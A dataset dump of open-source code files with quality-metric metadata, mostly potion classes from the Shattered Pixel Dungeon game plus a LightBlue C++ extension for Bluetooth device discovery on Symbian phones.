private void spreadFlames(int cell, float strength){
if (strength >= 0 && (Dungeon.level.passable[cell] || Dungeon.level.flamable[cell])){
affectedCells.add(cell);
if (strength >= 1.5f) {
visualCells.remove(cell);
spreadFlames(cell + PathFinder.CIRCLE8[left(direction)], strength - 1.5f);
spreadFlames(cell + PathFinder.CIRCLE8[direction], strength - 1.5f);
spreadFlames(cell + PathFinder.CIRCLE8[right(direction)], strength - 1.5f);
} else {
visualCells.add(cell);
}
} else if (!Dungeon.level.passable[cell])
visualCells.add(cell);
}
private int left(int direction){
return direction == 0 ? 7 : direction-1;
}
private int right(int direction){
return direction == 7 ? 0 : direction+1;
}
}
| 5,984 | PotionOfDragonsBreath | java | en | java | code | {"qsc_code_num_words": 683, "qsc_code_num_chars": 5984.0, "qsc_code_mean_word_length": 5.86090776, "qsc_code_frac_words_unique": 0.35578331, "qsc_code_frac_chars_top_2grams": 0.04046965, "qsc_code_frac_chars_top_3grams": 0.15188609, "qsc_code_frac_chars_top_4grams": 0.16487634, "qsc_code_frac_chars_dupe_5grams": 0.26255309, "qsc_code_frac_chars_dupe_6grams": 0.17711716, "qsc_code_frac_chars_dupe_7grams": 0.05046215, "qsc_code_frac_chars_dupe_8grams": 0.02648014, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01206377, "qsc_code_frac_chars_whitespace": 0.22426471, "qsc_code_size_file_byte": 5984.0, "qsc_code_num_lines": 187.0, "qsc_code_num_chars_line_max": 88.0, "qsc_code_num_chars_line_mean": 32.0, "qsc_code_frac_chars_alphabet": 0.85028005, "qsc_code_frac_chars_comments": 0.20254011, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.13953488, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00125733, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.00534759, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.06976744, "qsc_codejava_score_lines_no_logic": 0.24031008, "qsc_codejava_frac_words_no_modifier": 0.8, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/exotic/PotionOfCleansing.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.exotic;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Corruption;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Hunger;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.watabou.noosa.audio.Sample;
public class PotionOfCleansing extends ExoticPotion {
{
initials = 9;
}
@Override
public void apply( Hero hero ) {
setKnown();
cleanse( hero );
}
@Override
public void shatter(int cell) {
if (Actor.findChar(cell) == null){
super.shatter(cell);
} else {
if (Dungeon.level.heroFOV[cell]) {
Sample.INSTANCE.play(Assets.SND_SHATTER);
splash(cell);
setKnown();
}
if (Actor.findChar(cell) != null){
cleanse(Actor.findChar(cell));
}
}
}
public static void cleanse(Char ch){
for (Buff b : ch.buffs()){
if (b.type == Buff.buffType.NEGATIVE && !(b instanceof Corruption)){
b.detach();
}
if (b instanceof Hunger){
((Hunger) b).satisfy(Hunger.STARVING);
}
}
}
}
| 2,147 | PotionOfCleansing | java | en | java | code | {"qsc_code_num_words": 269, "qsc_code_num_chars": 2147.0, "qsc_code_mean_word_length": 5.85501859, "qsc_code_frac_words_unique": 0.49442379, "qsc_code_frac_chars_top_2grams": 0.09714286, "qsc_code_frac_chars_top_3grams": 0.21714286, "qsc_code_frac_chars_top_4grams": 0.22349206, "qsc_code_frac_chars_dupe_5grams": 0.28126984, "qsc_code_frac_chars_dupe_6grams": 0.14031746, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01003344, "qsc_code_frac_chars_whitespace": 0.16441546, "qsc_code_size_file_byte": 2147.0, "qsc_code_num_lines": 74.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 29.01351351, "qsc_code_frac_chars_alphabet": 0.86789298, "qsc_code_frac_chars_comments": 0.36329762, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.08888889, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.06666667, "qsc_codejava_score_lines_no_logic": 0.28888889, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/series60/_lightblueutil/_lightblueutil.cpp | /*
* Copyright (c) 2009 Bea Lam. All rights reserved.
*
* This file is part of LightBlue.
*
* LightBlue is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* LightBlue is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with LightBlue. If not, see <http://www.gnu.org/licenses/>.
*/
// This file provides a Python extension for performing operations not offered
// in the standard Python for Series 60 API, including:
// - non-GUI discovery
// - access to local device information
#include <e32base.h>
#include <e32std.h>
#include <es_sock.h>
#include <bt_sock.h>
#include <bttypes.h>
#if defined(__SYMBIAN_9__) || defined(__SYMBIAN_8__)
# include <bt_subscribe.h>
#endif
#include <btextnotifiers.h> // TBTDeviceResponseParamsPckg
#include <btdevice.h>
#include <symbian_python_ext_util.h>
#include <Python.h>
// structure that will hold the info about a remote device
struct TDeviceData
{
THostName iDeviceName;
TBTDevAddr iDeviceAddr;
TInt16 iServiceClass;
TInt8 iMajorClass;
TInt8 iMinorClass;
};
// typedef for a list of TDeviceData structures
typedef RPointerArray<TDeviceData> TDeviceDataList;
// Converts a TBTDevAddr to a bluetooth address string
// Arguments:
// - addr - the address to convert
// - aString - the TDes8 to hold the converted string result
static void DevAddressToString(TBTDevAddr& addr, TDes8& aString)
{
// from PDIS miso library
// GetReadable() does not produce a "standard" result,
// so have to construct a string manually.
aString.Zero();
_LIT8(KColon, ":");
for (TInt i=0; i<6; i++)
{
const TUint8& val = addr[i];
aString.AppendNumFixedWidthUC(val, EHex, 2);
if (i < 5)
aString.Append(KColon);
}
}
// Presents a Device Selection UI and returns the error code.
//
// Arguments:
// - aResponse - the object to hold the details of the selected device.
//
// Returns an error code.
TInt SelectDeviceUI(TBTDeviceResponseParamsPckg& aResponse)
{
TInt err;
RNotifier notifier;
err = notifier.Connect();
if (err) return err;
TBTDeviceSelectionParamsPckg selectionFilter;
TRequestStatus status;
notifier.StartNotifierAndGetResponse(
status,
KDeviceSelectionNotifierUid,
selectionFilter,
aResponse
);
User::WaitForRequest(status);
err = status.Int();
notifier.CancelNotifier(KDeviceSelectionNotifierUid);
notifier.Close();
return err;
}
// Wraps SelectDeviceUI() to provide a Python method interface.
// Takes no arguments.
//
// Returns None if user cancelled, otherwise returns a
// (name, address, (service,major,minor)) Python tuple.
static PyObject* LightBlue_SelectDevice(PyObject* self, PyObject* args)
{
if (!PyArg_ParseTuple(args, ""))
return NULL;
TBTDeviceResponseParamsPckg response;
TInt err = SelectDeviceUI(response);
if (err) {
if (err == KErrCancel) {
// user cancelled
Py_INCREF(Py_None);
return Py_None;
} else {
// some other error occured
return SPyErr_SetFromSymbianOSErr(err);
}
}
if (!(response().IsValidDeviceName())) {
PyErr_SetString(PyExc_SymbianError, "discovery returned invalid data");
return NULL;
}
// get device address
TBuf8<6*2+5> addrString;
TBTDevAddr addr = response().BDAddr();
DevAddressToString(addr, addrString);
// get device class details
TBTDeviceClass deviceClass = response().DeviceClass();
TUint16 service = deviceClass.MajorServiceClass();
TUint8 major = deviceClass.MajorDeviceClass();
TUint8 minor = deviceClass.MinorDeviceClass();
return Py_BuildValue("s#u#(iii)",
addrString.Ptr(), addrString.Length(),
response().DeviceName().Ptr(), response().DeviceName().Length(),
service,
major,
minor);
}
// Looks up the name of the device with the given address.
// Arguments:
// - wantedAddr - address of the device to look up. Note that the address
// is expected without colons!! e.g. "000D9319C868"
// - aDeviceName - the object to hold the name once it is found
// - ignoreCache - if True, performs a remote name request even if the device
// name is known in the cache from a previous request.
//
// Returns an error code.
static TInt LookupName(TBTDevAddr& wantedAddr, THostName* aDeviceName,
bool ignoreCache)
{
TInt err = KErrNone;
RSocketServ socketServer;
RHostResolver hostResolver;
TRequestStatus status;
TNameEntry nameEntry;
// make a TInquirySockAddr with the address of the device we want to look up
TBTSockAddr sockAddr;
sockAddr.SetBTAddr(wantedAddr);
TInquirySockAddr addr = addr.Cast(sockAddr);
// connect
err = socketServer.Connect();
if (err)
return err;
// load protocol for discovery
TProtocolDesc protocolDesc;
err = socketServer.FindProtocol(_L("BTLinkManager"), protocolDesc);
if (!err) {
// initialize host resolver
err = hostResolver.Open(socketServer, protocolDesc.iAddrFamily, protocolDesc.iProtocol);
if (!err) {
// Request name lookup.
// We don't need to call SetIAC() if we're just doing name lookup.
// Don't put KHostResInquiry flag in SetAction(), because that
// will start a device inquiry, when we just want to find the one
// name.
if (ignoreCache) {
addr.SetAction(KHostResName|KHostResIgnoreCache);
} else {
addr.SetAction(KHostResName);
}
hostResolver.GetByAddress(addr, nameEntry, status);
User::WaitForRequest(status);
if (status == KErrNone) {
*aDeviceName = nameEntry().iName;
err = KErrNone;
} else {
err = KErrGeneral;
}
hostResolver.Close();
}
}
socketServer.Close();
return err;
}
// Wraps LookupName() to provide a Python method interface.
// Arguments:
// - address of the device to look up. Note that the address
// is expected without colons!! e.g. "000D9319C868"
// - True/False - if True, performs a remote name request even if the device
// name is known in the cache from a previous request.
//
// Returns the name (a Python unicode string).
static PyObject* LightBlue_LookupName(PyObject* self, PyObject* args)
{
const char *addr;
bool ignoreCache;
if (!PyArg_ParseTuple(args, "sb", &addr, &ignoreCache))
return NULL;
THostName deviceName;
TBTDevAddr wantedAddr;
TBuf16<128> buf;
buf.Copy(_L8(addr));
wantedAddr.SetReadable(buf);
TInt err = LookupName(wantedAddr, &deviceName, ignoreCache);
if (err)
return SPyErr_SetFromSymbianOSErr(err);
return Py_BuildValue("u#", deviceName.Ptr(), deviceName.Length());
}
// Performs a device discovery. Blocks until all devices are found.
// Arguments:
// - aDevDataList - details of each found device will be put in a TDeviceData
// and added to this list
// - lookupNames - whether to perform name lookups
//
// Returns an error code.
static TInt DiscoverDevices(TDeviceDataList* aDevDataList, bool lookupNames)
{
TInt err = KErrNone;
RSocketServ socketServer;
RHostResolver hostResolver;
TInquirySockAddr addr;
TRequestStatus status;
TNameEntry nameEntry;
// connect
err = socketServer.Connect();
if (err)
return err;
// load protocol for discovery
TProtocolDesc protocolDesc;
err = socketServer.FindProtocol(_L("BTLinkManager"), protocolDesc);
if (!err) {
// initialize host resolver
err = hostResolver.Open(socketServer, protocolDesc.iAddrFamily, protocolDesc.iProtocol);
if (!err) {
// start device discovery by invoking remote address lookup
addr.SetIAC(KGIAC);
if (lookupNames) {
addr.SetAction(KHostResInquiry|KHostResName|KHostResIgnoreCache);
} else {
addr.SetAction(KHostResInquiry|KHostResIgnoreCache);
}
hostResolver.GetByAddress(addr, nameEntry, status);
while( User::WaitForRequest( status ),
(status == KErrNone || status == KRequestPending) )
{
// store new device data entry
TDeviceData *devData = new (ELeave) TDeviceData();
if (lookupNames)
devData->iDeviceName = nameEntry().iName;
devData->iDeviceAddr =
static_cast<TBTSockAddr>(nameEntry().iAddr).BTAddr();
TInquirySockAddr &isa = TInquirySockAddr::Cast(nameEntry().iAddr);
devData->iServiceClass = (TInt16)isa.MajorServiceClass();
devData->iMajorClass = (TInt8)isa.MajorClassOfDevice();
devData->iMinorClass = (TInt8)isa.MinorClassOfDevice();
// add device data entry to list
aDevDataList->Append(devData);
// get next discovered device
hostResolver.Next( nameEntry, status );
}
hostResolver.Close();
}
}
socketServer.Close();
return err;
}
// Wraps DiscoverDevices() to provide a Python method interface.
// Arguments:
// - boolean value of whether to perform name lookup
//
// Returns list of (address, name, (service,major,minor)) tuples detailing the
// found devices.
static PyObject* LightBlue_DiscoverDevices(PyObject* self, PyObject* args)
{
bool lookupNames;
if (!PyArg_ParseTuple(args, "b", &lookupNames))
return NULL;
// run the discovery
TDeviceDataList devDataList;
TInt err = DiscoverDevices(&devDataList, lookupNames);
if (err)
return SPyErr_SetFromSymbianOSErr(err);
// put the results into a python list
TInt i;
TDeviceData *devData;
TBuf8<6*2+5> addrString;
PyObject *addrList = PyList_New(0); // python list to hold results
for( i=0; i<devDataList.Count(); i++ )
{
devData = devDataList[i];
// convert address to string
DevAddressToString(devData->iDeviceAddr, addrString);
PyObject *devValues;
if (lookupNames) {
THostName name = devData->iDeviceName;
devValues = Py_BuildValue("(s#u#(iii))",
addrString.Ptr(), addrString.Length(), // s# - address
name.Ptr(), name.Length(), // u# - name
devData->iServiceClass, // i - service class
devData->iMajorClass, // i - major class
devData->iMinorClass // i - minor class
);
} else {
devValues = Py_BuildValue("(s#O(iii))",
addrString.Ptr(), addrString.Length(), // s# - address
Py_None,
devData->iServiceClass, // i - service class
devData->iMajorClass, // i - major class
devData->iMinorClass // i - minor class
);
}
// add tuple to list
PyList_Append(addrList, devValues);
}
devDataList.ResetAndDestroy();
return addrList;
}
// from PDIS miso library
// Gets the local device address.
// Arguments:
// - aAddress - object to hold the retrieved address.
//
// Returns an error code.
static TInt GetLocalAddress(TBTDevAddr& aAddress)
{
TInt err = KErrNone;
#if defined(__SYMBIAN_9__)
TPtr8 ptr(aAddress.Des());
err = RProperty::Get(KPropertyUidBluetoothCategory,
KPropertyKeyBluetoothGetLocalDeviceAddress,
ptr);
#elif defined(__SYMBIAN_8__)
TPtr8 ptr(aAddress.Des());
err = RProperty::Get(KPropertyUidBluetoothCategory,
KPropertyKeyBluetoothLocalDeviceAddress,
ptr);
#else
RSocketServ socketServ;
err = socketServ.Connect();
if (err)
return err;
// this solution comes from the "bthci" Series 60 example;
// does not work on Symbian 8-up
RSocket socket;
err = socket.Open(socketServ, KBTAddrFamily, KSockSeqPacket, KL2CAP);
if (!err) {
TPckgBuf<TBTDevAddr> btDevAddrPckg;
TRequestStatus status;
socket.Ioctl(KHCILocalAddressIoctl, status, &btDevAddrPckg, KSolBtHCI);
User::WaitForRequest(status);
err = status.Int();
if (!err) {
TPtrC8 src(btDevAddrPckg().Des());
TPtr8 dest(aAddress.Des());
dest.Copy(src);
}
socket.Close();
}
socketServ.Close();
#endif
return err;
}
// Wraps GetLocalAddress() to provide a Python method interface.
// Takes no arguments.
//
// Returns local device address as Python string.
static PyObject* LightBlue_GetLocalAddress(PyObject* self, PyObject* args)
{
TBTDevAddr addr;
TBuf8<6*2+5> addrString;
if (!PyArg_ParseTuple(args, ""))
return NULL;
TInt err = GetLocalAddress(addr);
if (err)
return SPyErr_SetFromSymbianOSErr(err);
DevAddressToString(addr, addrString);
return Py_BuildValue("s#", addrString.Ptr(), addrString.Length());
}
// from PDIS miso library
// Gets the local device name.
// Arguments:
// - aName - object to hold the retrieved name.
//
// Returns an error code.
static TInt GetLocalName(TDes& aName)
{
TInt err = KErrNone;
RSocketServ socketServ;
err = socketServ.Connect();
if (!err) {
TProtocolName protocolName;
// address and name queries are apparently supplied
// by the BT stack's link manager
_LIT(KBtLinkManager, "BTLinkManager");
protocolName.Copy(KBtLinkManager);
TProtocolDesc protocolDesc;
err = socketServ.FindProtocol(protocolName, protocolDesc);
if (!err) {
RHostResolver hostResolver;
err = hostResolver.Open(socketServ,
protocolDesc.iAddrFamily,
protocolDesc.iProtocol);
if (!err) {
err = hostResolver.GetHostName(aName);
hostResolver.Close();
}
}
socketServ.Close();
}
return err;
}
// Wraps GetLocalName() to provide a Python method interface.
// Takes no arguments.
//
// Returns the local device name as a unicode python string.
static PyObject* LightBlue_GetLocalName(PyObject* self, PyObject* args)
{
TBTDeviceName deviceName;
if (!PyArg_ParseTuple(args, ""))
return NULL;
TInt err = GetLocalName(deviceName);
if (err)
return SPyErr_SetFromSymbianOSErr(err);
return Py_BuildValue("u#", deviceName.Ptr(), deviceName.Length());
}
// Gets the local device class.
// Arguments:
// - aDeviceData - object to hold the retrieved class data.
//
// Returns an error code.
//static TInt GetLocalDeviceClass(TDeviceData& aDeviceData)
static TInt GetLocalDeviceClass(TBTDeviceClass& aDeviceClass)
{
TInt err = KErrNone;
#if defined(__SYMBIAN_9__)
TInt cod;
err = RProperty::Get(KPropertyUidBluetoothCategory,
KPropertyKeyBluetoothGetDeviceClass,
cod);
if (err == KErrNone) {
aDeviceClass = TBTDeviceClass(cod);
}
#elif defined(__SYMBIAN_8__)
TInt cod;
err = RProperty::Get(KPropertyUidBluetoothCategory,
KPropertyKeyBluetoothDeviceClass,
cod);
if (err == KErrNone) {
aDeviceClass = TBTDeviceClass(cod);
}
#else
RSocketServ socketServ;
RSocket sock;
err = socketServ.Connect();
if (!err) {
err = sock.Open(socketServ, KBTAddrFamily, KSockSeqPacket, KL2CAP);
if (!err) {
THCIDeviceClassBuf codBuf;
TRequestStatus status;
sock.Ioctl(KHCIReadDeviceClassIoctl, status, &codBuf, KSolBtHCI);
User::WaitForRequest(status);
if (status.Int() == KErrNone) {
aDeviceClass = TBTDeviceClass(codBuf().iMajorServiceClass,
codBuf().iMajorDeviceClass,
codBuf().iMinorDeviceClass);
}
sock.Close();
}
socketServ.Close();
}
#endif
return err;
}
// Wraps GetLocalDeviceClass() to provide a Python method interface.
// Takes no arguments.
//
// Returns the local device class (an integer).
static PyObject* LightBlue_GetLocalDeviceClass(PyObject* self, PyObject* args)
{
//TDeviceData aDeviceData;
TBTDeviceClass aDeviceClass;
if (!PyArg_ParseTuple(args, ""))
return NULL;
TInt err = GetLocalDeviceClass(aDeviceClass);
if (err)
return SPyErr_SetFromSymbianOSErr(err);
return Py_BuildValue("i", aDeviceClass.DeviceClass());
}
// provide access to apn_resolver from PDIS library
extern PyObject* apn_resolver_new(PyObject* /*self*/,
PyObject* /*args*/);
extern TInt apn_resolver_ConstructType();
// define module methods
static const PyMethodDef _lightblueutil_methods[] = {
{"lookupName", (PyCFunction)LightBlue_LookupName, METH_VARARGS},
{"selectDevice", (PyCFunction)LightBlue_SelectDevice, METH_VARARGS},
{"discoverDevices", (PyCFunction)LightBlue_DiscoverDevices, METH_VARARGS},
{"getLocalAddress", (PyCFunction)LightBlue_GetLocalAddress, METH_VARARGS},
{"getLocalName", (PyCFunction)LightBlue_GetLocalName, METH_VARARGS},
{"getLocalDeviceClass", (PyCFunction)LightBlue_GetLocalDeviceClass, METH_VARARGS},
{"AoResolver", (PyCFunction)apn_resolver_new, METH_NOARGS},
{0, 0}
};
/* initialise the module */
DL_EXPORT(void) init_lightblueutil(void)
{
/* Create the module and add the functions */
Py_InitModule("_lightblueutil", (PyMethodDef*)_lightblueutil_methods);
if (apn_resolver_ConstructType() < 0) return;
}
/* This function is mandatory in Symbian DLL's. */
#ifndef EKA2
GLDEF_C TInt E32Dll(TDllReason)
{
return KErrNone;
}
#endif /*EKA2*/
| 18,918 | _lightblueutil | cpp | en | cpp | code | {"qsc_code_num_words": 1846, "qsc_code_num_chars": 18918.0, "qsc_code_mean_word_length": 6.36457205, "qsc_code_frac_words_unique": 0.25568797, "qsc_code_frac_chars_top_2grams": 0.01021364, "qsc_code_frac_chars_top_3grams": 0.00842625, "qsc_code_frac_chars_top_4grams": 0.01429909, "qsc_code_frac_chars_dupe_5grams": 0.32147417, "qsc_code_frac_chars_dupe_6grams": 0.27389565, "qsc_code_frac_chars_dupe_7grams": 0.22955145, "qsc_code_frac_chars_dupe_8grams": 0.16333305, "qsc_code_frac_chars_dupe_9grams": 0.13660737, "qsc_code_frac_chars_dupe_10grams": 0.12392544, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00678931, "qsc_code_frac_chars_whitespace": 0.27592769, "qsc_code_size_file_byte": 18918.0, "qsc_code_num_lines": 629.0, "qsc_code_num_chars_line_max": 97.0, "qsc_code_num_chars_line_mean": 30.07631161, "qsc_code_frac_chars_alphabet": 0.85092714, "qsc_code_frac_chars_comments": 0.28787398, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.36096257, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.01618171, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codecpp_frac_lines_preprocessor_directives": 0.06684492, "qsc_codecpp_frac_lines_func_ratio": 0.09625668, "qsc_codecpp_cate_bitsstdc": 0.0, "qsc_codecpp_nums_lines_main": 0.0, "qsc_codecpp_frac_lines_goto": 0.0, "qsc_codecpp_cate_var_zero": 0.0, "qsc_codecpp_score_lines_no_logic": 0.17914439, "qsc_codecpp_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codecpp_frac_lines_func_ratio": 0, "qsc_codecpp_nums_lines_main": 0, "qsc_codecpp_score_lines_no_logic": 0, "qsc_codecpp_frac_lines_preprocessor_directives": 0, "qsc_codecpp_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/exotic/PotionOfShielding.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.exotic;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Barrier;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
public class PotionOfShielding extends ExoticPotion {
{
initials = 3;
}
@Override
public void apply(Hero hero) {
setKnown();
//~75% of a potion of healing
Buff.affect(hero, Barrier.class).setShield((int)(0.6f*hero.HT + 10));
}
}
